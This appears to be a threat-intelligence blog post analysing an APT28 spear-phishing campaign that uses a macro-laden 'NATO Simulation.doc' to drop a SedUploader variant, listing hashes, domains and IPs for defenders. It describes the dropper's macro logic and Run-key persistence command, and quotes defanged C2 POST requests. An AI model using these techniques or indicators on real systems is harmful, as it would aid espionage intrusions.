APT28 / Fancy Bear still targeting military institutions

fancy-bearAPT28, aka Fancy Bear, the famous hacker group believed to be state-sponsored from Russia, seems to be targeting NATO partners / defense / military institutions / affairs in these hours. Spear-phishing emails with attached a malicious document referring to a “nato simulation” event (the name of the doc is “NATO Simulation.doc“), seem to be used to try to compromise some institutional entities (likely from north /  east europe).

The hunting group involved in the analysis of this event is composed by @MD0ugh, @DrunkBinary, @r0ny_123, @Manu_De_Lucia. 

Thanks to @MD0ugh for sharing the sample with all of us.

Quick Recap:

The document has been designed to drop a first malicious component likely belonging to the APT28 / Fancy Bear arsenal.

A quite high rate of code reuse and internal analysis confirm it ‘s a SedUploader variant.

Meta-data and others investigations seem to suggest that the malicious infrastructure and components have been setted up only few days ago (at the end of November 2018).

Some images about the domain name creation date

cnc_2

 and the service setting up

cnc

On the basis of what i can observe in samples and public data, following there is a timeline reconstruction about the development of the operation:

timeline

Technical Details:

A screenshot of part of the decoy attached is shown following:

spear-phishing-screenshot

This spear-phishing document (md5: 43D7FFD611932CF51D7150B176ECFC29) is armed with macro code designed to work primarly through the main event controlled by sub AutoOpen().

On offset 0x00006460 the .bin embedded content.

document_offset

On macro activation the instructions are designed to read specific xml node of the document itself through xmlParser and extract / decode the base64 encoded content from XPath

//HLinks/vt:vector/vt:variant/vt:lpwstr

Extracted VBA macro code seems to be very similar to that used previously in APT28 / Fancy Bear “hospitality campaign”.

Following an image which compares an extract of the two codes:

macro_2

The payload is no more than a PEDLL executable file.

This is dropped under

%APPDATA%\Uplist.dat

and

%ALLUSERSPROFILE%\UpdaterUI.dll.

Files are written with vbHidden attributes.

Following a part of base64 encoded payload:

base64

Macro instructions within sub_AutoOpen() function are designed to achieve persistency also, writing under the following RegKey

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UIMgr

with a REG_SZ value

C:\Windows\System32\rundll32.exe “%ALLUSERSPROFILE%\UpdaterUI.dll “, “#1″”

macro_4

 First run performed through WMI

macro_3

sub_AutoClose() has similar functionality writing a PE with a rnd generated name under %TEMP% which appears to be executed via PowerShell.

SedUploader:

The content dropped seems to be a  SedUploader variant identified with MD5 hash: 549726B8BFB1919A343AC764D48FDC81

Some details about:

details_sedupl_1

From the malware components under my lenses, the actor is proposing the same TTPs observed in similar operations conducted in the past.

I performed at first a statical / comparative code analysis of the malicious executable, obtaining the following results:

genes_1

Malware family was confirmed later by Intezer platform. View their report here

Looking at some DNS statistical hits observed for the domain name extracted, may be that at least one of these spear-phishing documents achieved the mission of first phase access. Obviously, no truth about it [really still few statistics about].

Finally, a quick high level exploding of the main cycle of the malware is reported following:

workflow

The outside word is contacted through requests like these:

[+] POST hxxps://beatguitar.com/aadv/gJNn/X2/ep/VQOA/3.SMPTE292M/?ct=+lMQKtXi0kf+3MVk38U=

[+] POST hxxps://beatguitar.com/n2qqSy/HPSe0/SY/yAsFy8/mSaYZP/lw.sip/?n=VxL0BnijNmtTnSFIcoQ=

after to have collected several infos about the victim system and to have performed some minimal anti-VM and connectivity checks [requesting legitimate services].

The first list of IoC reported and components under analysis are compatible with the modus operandi of group in question (domain registration, technologies in placecomponentsfingerprint). The activity is in line with the actor mission also.

At time of writing, some others  further malicious domain names possibly related to the campaign are under investigations. Anyway, analysis is ongoing.

IoC:

domain name: beatguitar[.]com

IP: 185.99.133[.]72

md5: 43D7FFD611932CF51D7150B176ECFC29 [Spear-phishing DOC]

md5: 549726B8BFB1919A343AC764D48FDC81 [SedUploader / SofacyCarberp]

File name: NATO Simulation.doc

File name: UpdaterUI.dll

File name: Uplist.dat

Persistency: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UIMgr

Insights:

FireEye: APT28 targets hospitality sector

PaloAlto Unit42: Sofacy Attacks Multiple Government Entities

CSECybSec: APT28 – Hospitality Malware

ESET Research: Sednit update: Analysis of Zebrocy

2 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *


+ 7 = 8